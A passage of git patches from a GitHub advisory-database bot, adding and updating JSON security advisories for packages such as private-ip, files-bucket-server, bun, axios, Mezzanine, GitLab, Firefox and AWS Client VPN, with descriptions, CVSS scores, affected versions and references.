"0" + }, + { + "last_affected": "3.0.2" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -27,6 +48,10 @@ "type": "WEB", "url": "https://gist.github.com/lirantal/ed18a4493ca9fe4429957c79454a9df1" }, + { + "type": "PACKAGE", + "url": "https://github.com/frenchbread/private-ip" + }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-PRIVATEIP-9510757" @@ -37,8 +62,8 @@ "CWE-918" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T16:01:49Z", "nvd_published_at": "2025-07-23T05:15:30Z" } } \ No newline at end of file From 227e518e2740341c7374b48475fa033abefc717b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 16:34:17 +0000 Subject: [PATCH 120/323] Publish GHSA-3r3j-4vrw-884j --- .../GHSA-3r3j-4vrw-884j.json | 37 ++++++++++++++++--- 1 file changed, 31 insertions(+), 6 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json (58%) diff --git a/advisories/unreviewed/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json b/advisories/github-reviewed/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json similarity index 58% rename from advisories/unreviewed/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json rename to advisories/github-reviewed/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json index 4a7a763c3a917..360fe35ddd5a3 100644 --- a/advisories/unreviewed/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json +++ b/advisories/github-reviewed/2025/07/GHSA-3r3j-4vrw-884j/GHSA-3r3j-4vrw-884j.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-3r3j-4vrw-884j", - "modified": "2025-07-23T06:33:50Z", + "modified": "2025-07-23T16:32:11Z", "published": "2025-07-23T06:33:50Z", "aliases": [ "CVE-2025-8021" ], + "summary": "files-bucket-server vulnerable to Directory Traversal", "details": "All versions of the package files-bucket-server are vulnerable to Directory Traversal where an attacker can traverse the file system and access files outside of the intended directory.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "files-bucket-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.6" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -25,7 +46,11 @@ }, { "type": "WEB", - "url": "https://gist.github.com/lirantal/1f833a7d445e8cfbdcb3e75022954b35%23path-traversal-vulnerability-in-files-bucket-server" + "url": "https://gist.github.com/lirantal/1f833a7d445e8cfbdcb3e75022954b35#path-traversal-vulnerability-in-files-bucket-server" + }, + { + "type": "PACKAGE", + "url": "https://github.com/dsilva2401/files-bucket-server" }, { "type": "WEB", @@ -37,8 +62,8 @@ "CWE-22" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T16:32:11Z", "nvd_published_at": "2025-07-23T05:15:30Z" } } \ No newline at end of file From b4933b919a8e1829443f165260379a22fc7e213f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 16:40:44 +0000 Subject: [PATCH 121/323] Publish GHSA-4j66-8f4r-3pjx --- .../GHSA-4j66-8f4r-3pjx.json | 35 ++++++++++++++++--- 1 file changed, 30 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json (66%) diff --git a/advisories/unreviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json b/advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json similarity index 66% rename from advisories/unreviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json rename to advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json index 42489e28daa14..cc70cd962bccb 100644 --- a/advisories/unreviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json +++ b/advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-4j66-8f4r-3pjx", - "modified": "2025-07-23T06:33:50Z", + "modified": "2025-07-23T16:38:39Z", "published": "2025-07-23T06:33:50Z", "aliases": [ "CVE-2025-8022" ], + "summary": "bun vulnerable to OS Command Injection", "details": "All versions of the package bun are vulnerable to Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the $ shell API due to improper neutralization of user input. An attacker can exploit this by providing specially crafted input that includes command-line arguments or shell metacharacters, leading to unintended command execution.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "bun" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1.39" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -27,6 +48,10 @@ "type": "WEB", "url": "https://gist.github.com/lirantal/9780d664037f29d5277d7b2bc569d213" }, + { + "type": "PACKAGE", + "url": "https://github.com/oven-sh/bun" + }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-BUN-9510752" @@ -37,8 +62,8 @@ "CWE-78" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T16:38:39Z", "nvd_published_at": "2025-07-23T05:15:30Z" } } \ No newline at end of file From fc17a1eac0cafa9a8adbab6effdc2a62eceab04b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 16:51:42 +0000 Subject: [PATCH 122/323] Publish GHSA-rm8p-cx58-hcvx --- .../GHSA-rm8p-cx58-hcvx.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json diff --git a/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json b/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json new file mode 100644 index 0000000000000..24183bf5ad068 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm8p-cx58-hcvx", + "modified": "2025-07-23T16:50:13Z", + "published": "2025-07-23T16:49:38Z", + "aliases": [], + "summary": "Axios has Transitive Critical Vulnerability via form-data — Predictable Boundary Values (CVE-2025-7783)", + "details": "### Summary\nA critical vulnerability exists in the form-data package used by `axios@1.10.0`. The issue allows an attacker to predict multipart boundary values generated using `Math.random()`, opening the door to HTTP parameter pollution or injection attacks.\n\nThis was submitted in [issue #6969](https://github.com/axios/axios/issues/6969) and addressed in [pull request #6970](https://github.com/axios/axios/pull/6970).\n\n### Details\nThe vulnerable package `form-data@4.0.0` is used by `axios@1.10.0` as a transitive dependency. It uses non-secure, deterministic randomness (`Math.random()`) to generate multipart boundary strings.\n\nThis flaw is tracked under [Snyk Advisory SNYK-JS-FORMDATA-10841150](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150) and [CVE-2025-7783](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150).\n\nAffected `form-data` versions:\n- <2.5.4\n- >=3.0.0 <3.0.4\n- >=4.0.0 <4.0.4\n\nSince `axios@1.10.0` pulls in `form-data@4.0.0`, it is exposed to this issue.\n\n\n### PoC\n1. Install Axios: - `npm install axios@1.10.0`\n2.Run `snyk test`:\n```\nTested 104 dependencies for known issues, found 1 issue, 1 vulnerable path.\n\n✗ Predictable Value Range from Previous Values [Critical Severity]\nin form-data@4.0.0 via axios@1.10.0 > form-data@4.0.0\n\n```\n3. Trigger a multipart/form-data request. Observe the boundary header uses predictable random values, which could be exploited in a targeted environment.\n\n\n### Impact\n\n- **Vulnerability Type**: Predictable Value / HTTP Parameter Pollution\n- **Risk**: Critical (CVSS 9.4)\n- **Impacted Users**: Any application using axios@1.10.0 to submit multipart form-data\n\n\nThis could potentially allow attackers to:\n- Interfere with multipart request parsing\n- Inject unintended parameters\n- Exploit backend deserialization logic depending on content boundaries\n\n### Related Links\n[GitHub Issue #6969](https://github.com/axios/axios/issues/6969)\n\n[Pull Request #xxxx](https://github.com/axios/axios/pull/xxxx) (replace with actual link)\n\n[Snyk Advisory](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150)\n\n[form-data on npm](https://www.npmjs.com/package/form-data)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.10.0" + }, + { + "fixed": "1.11.0" + } + ] + } + ], + "versions": [ + "1.10.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/axios/axios/security/advisories/GHSA-rm8p-cx58-hcvx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783" + }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/issues/6969" + }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/6970" + }, + { + "type": "PACKAGE", + "url": "https://github.com/axios/axios" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T16:49:38Z", + "nvd_published_at": null + } +} \ No newline at end of file From a99c37d1e66b7e2a1638ab49a5430278ad542d2a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 18:32:22 +0000 Subject: [PATCH 123/323] Publish Advisories GHSA-269j-37ww-cmh3 GHSA-2gfp-c6c8-h38v GHSA-2r7r-6rh2-7qc9 GHSA-7jcf-w576-jvj3 GHSA-cgm9-25c8-vhvr GHSA-m297-2wvr-723p GHSA-m5hw-rhvr-f47c GHSA-mm3g-858w-g8p8 GHSA-pmfv-5ppm-9fqc GHSA-q9rx-45gj-g3f5 GHSA-r69h-f35r-wf4c GHSA-rxm7-9j9m-hc3w GHSA-ww6j-fhx6-wrxh --- .../GHSA-269j-37ww-cmh3.json | 40 +++++++++++++++++++ .../GHSA-2gfp-c6c8-h38v.json | 2 +- .../GHSA-2r7r-6rh2-7qc9.json | 40 +++++++++++++++++++ .../GHSA-7jcf-w576-jvj3.json | 15 +++++-- .../GHSA-cgm9-25c8-vhvr.json | 40 +++++++++++++++++++ .../GHSA-m297-2wvr-723p.json | 40 +++++++++++++++++++ .../GHSA-m5hw-rhvr-f47c.json | 15 +++++-- .../GHSA-mm3g-858w-g8p8.json | 15 +++++-- .../GHSA-pmfv-5ppm-9fqc.json | 40 +++++++++++++++++++ .../GHSA-q9rx-45gj-g3f5.json | 40 +++++++++++++++++++ .../GHSA-r69h-f35r-wf4c.json | 15 +++++-- .../GHSA-rxm7-9j9m-hc3w.json | 40 +++++++++++++++++++ .../GHSA-ww6j-fhx6-wrxh.json | 15 +++++-- 13 files changed, 336 insertions(+), 21 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2r7r-6rh2-7qc9/GHSA-2r7r-6rh2-7qc9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cgm9-25c8-vhvr/GHSA-cgm9-25c8-vhvr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m297-2wvr-723p/GHSA-m297-2wvr-723p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pmfv-5ppm-9fqc/GHSA-pmfv-5ppm-9fqc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q9rx-45gj-g3f5/GHSA-q9rx-45gj-g3f5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rxm7-9j9m-hc3w/GHSA-rxm7-9j9m-hc3w.json diff --git a/advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json b/advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json new file mode 100644 index 0000000000000..2c191437c6907 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-269j-37ww-cmh3", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-50481" + ], + "details": "A cross-site scripting (XSS) vulnerability in the component /blog/blogpost/add of Mezzanine CMS v6.1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a blog post.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50481" + }, + { + "type": "WEB", + "url": "https://github.com/kevinpdicks/Mezzanine-CMS-6.1.0-XSS" + }, + { + "type": "WEB", + "url": "https://github.com/stephenmcd/mezzanine" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T16:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2gfp-c6c8-h38v/GHSA-2gfp-c6c8-h38v.json b/advisories/unreviewed/2025/07/GHSA-2gfp-c6c8-h38v/GHSA-2gfp-c6c8-h38v.json index c285053d5818a..308d94c19e003 100644 --- a/advisories/unreviewed/2025/07/GHSA-2gfp-c6c8-h38v/GHSA-2gfp-c6c8-h38v.json +++ b/advisories/unreviewed/2025/07/GHSA-2gfp-c6c8-h38v/GHSA-2gfp-c6c8-h38v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gfp-c6c8-h38v", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T18:30:36Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-7724" diff --git a/advisories/unreviewed/2025/07/GHSA-2r7r-6rh2-7qc9/GHSA-2r7r-6rh2-7qc9.json b/advisories/unreviewed/2025/07/GHSA-2r7r-6rh2-7qc9/GHSA-2r7r-6rh2-7qc9.json new file mode 100644 index 0000000000000..00c9c23e44e1a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2r7r-6rh2-7qc9/GHSA-2r7r-6rh2-7qc9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2r7r-6rh2-7qc9", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-4439" + ], + "details": "An issue has been discovered in GitLab CE/EE affecting all versions from 15.10 before 18.0.5, 18.1 before 18.1.3, and 18.2 before 18.2.1 that could have allowed an authenticated user to perform cross-site scripting attacks when the instance is served through certain content delivery networks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4439" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3120111" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/541177" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T18:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7jcf-w576-jvj3/GHSA-7jcf-w576-jvj3.json b/advisories/unreviewed/2025/07/GHSA-7jcf-w576-jvj3/GHSA-7jcf-w576-jvj3.json index 49f895cd533c0..16571238db053 100644 --- a/advisories/unreviewed/2025/07/GHSA-7jcf-w576-jvj3/GHSA-7jcf-w576-jvj3.json +++ b/advisories/unreviewed/2025/07/GHSA-7jcf-w576-jvj3/GHSA-7jcf-w576-jvj3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7jcf-w576-jvj3", - "modified": "2025-07-22T21:31:16Z", + "modified": "2025-07-23T18:30:36Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8040" ], "details": "Memory safety bugs present in Firefox ESR 140.0, Thunderbird ESR 140.0, Firefox 140 and Thunderbird 140. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 141, Firefox ESR < 140.1, Thunderbird < 141, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:51Z" diff --git a/advisories/unreviewed/2025/07/GHSA-cgm9-25c8-vhvr/GHSA-cgm9-25c8-vhvr.json b/advisories/unreviewed/2025/07/GHSA-cgm9-25c8-vhvr/GHSA-cgm9-25c8-vhvr.json new file mode 100644 index 0000000000000..24bd4bf2fe680 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cgm9-25c8-vhvr/GHSA-cgm9-25c8-vhvr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgm9-25c8-vhvr", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-4700" + ], + "details": "An issue has been discovered in GitLab CE/EE affecting all versions from 15.10 before 18.0.5, 18.1 before 18.1.3, and 18.2 before 18.2.1 that, under specific circumstances, could have potentially allowed a successful attacker to trigger unintended content rendering leading to XSS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4700" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3120062" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/542915" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T18:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m297-2wvr-723p/GHSA-m297-2wvr-723p.json b/advisories/unreviewed/2025/07/GHSA-m297-2wvr-723p/GHSA-m297-2wvr-723p.json new file mode 100644 index 0000000000000..cf33bbbae776c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m297-2wvr-723p/GHSA-m297-2wvr-723p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m297-2wvr-723p", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-2633" + ], + "details": "Out of bounds read vulnerability due to improper bounds checking in NI LabVIEW in lvre!UDecStrToNum that may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q1 and prior versions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2633" + }, + { + "type": "WEB", + "url": "https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/out-of-bounds-read-vulnerabilities-in-ni-labview.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1285" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T16:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json b/advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json index 01afa011b706d..fbb82fe20352b 100644 --- a/advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json +++ b/advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m5hw-rhvr-f47c", - "modified": "2025-07-18T15:31:56Z", + "modified": "2025-07-23T18:30:33Z", "published": "2025-07-18T15:31:56Z", "aliases": [ "CVE-2025-46001" ], "details": "An arbitrary file upload vulnerability in the is_allowed_file_type() function of Filemanager v2.3.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T14:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-mm3g-858w-g8p8/GHSA-mm3g-858w-g8p8.json b/advisories/unreviewed/2025/07/GHSA-mm3g-858w-g8p8/GHSA-mm3g-858w-g8p8.json index ac9693064169c..3daad6b34078f 100644 --- a/advisories/unreviewed/2025/07/GHSA-mm3g-858w-g8p8/GHSA-mm3g-858w-g8p8.json +++ b/advisories/unreviewed/2025/07/GHSA-mm3g-858w-g8p8/GHSA-mm3g-858w-g8p8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mm3g-858w-g8p8", - "modified": "2025-07-22T21:31:16Z", + "modified": "2025-07-23T18:30:36Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8044" ], "details": "Memory safety bugs present in Firefox 140 and Thunderbird 140. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 141 and Thunderbird < 141.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:51Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pmfv-5ppm-9fqc/GHSA-pmfv-5ppm-9fqc.json b/advisories/unreviewed/2025/07/GHSA-pmfv-5ppm-9fqc/GHSA-pmfv-5ppm-9fqc.json new file mode 100644 index 0000000000000..bfa77b69ba6a5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pmfv-5ppm-9fqc/GHSA-pmfv-5ppm-9fqc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmfv-5ppm-9fqc", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-8069" + ], + "details": "During the AWS Client VPN client installation on Windows devices, the install process references the C:\\usr\\local\\windows-x86_64-openssl-localbuild\\ssl directory location to fetch the OpenSSL configuration file. As a result, a non-admin user could place arbitrary code in the configuration file. If an admin user starts the AWS Client VPN client installation process, that code could be executed with root-level privileges. This issue does not affect Linux or Mac devices. \n\nWe recommend users discontinue any new installations of AWS Client VPN on Windows prior to version 5.2.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8069" + }, + { + "type": "WEB", + "url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-014" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T16:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q9rx-45gj-g3f5/GHSA-q9rx-45gj-g3f5.json b/advisories/unreviewed/2025/07/GHSA-q9rx-45gj-g3f5/GHSA-q9rx-45gj-g3f5.json new file mode 100644 index 0000000000000..202ea4d4e2736 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q9rx-45gj-g3f5/GHSA-q9rx-45gj-g3f5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q9rx-45gj-g3f5", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-46171" + ], + "details": "vBulletin 3.8.7 is vulnerable to a denial-of-service condition via the misc.php?do=buddylist endpoint. If an authenticated user has a sufficiently large buddy list, processing the list can consume excessive memory, exhausting system resources and crashing the forum.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46171" + }, + { + "type": "WEB", + "url": "https://github.com/oiyl/CVE-2025-46171" + }, + { + "type": "WEB", + "url": "http://vbulletin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T16:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r69h-f35r-wf4c/GHSA-r69h-f35r-wf4c.json b/advisories/unreviewed/2025/07/GHSA-r69h-f35r-wf4c/GHSA-r69h-f35r-wf4c.json index 039398898aa3b..b2639f29d70c7 100644 --- a/advisories/unreviewed/2025/07/GHSA-r69h-f35r-wf4c/GHSA-r69h-f35r-wf4c.json +++ b/advisories/unreviewed/2025/07/GHSA-r69h-f35r-wf4c/GHSA-r69h-f35r-wf4c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r69h-f35r-wf4c", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T18:30:36Z", "published": "2025-07-22T21:31:15Z", 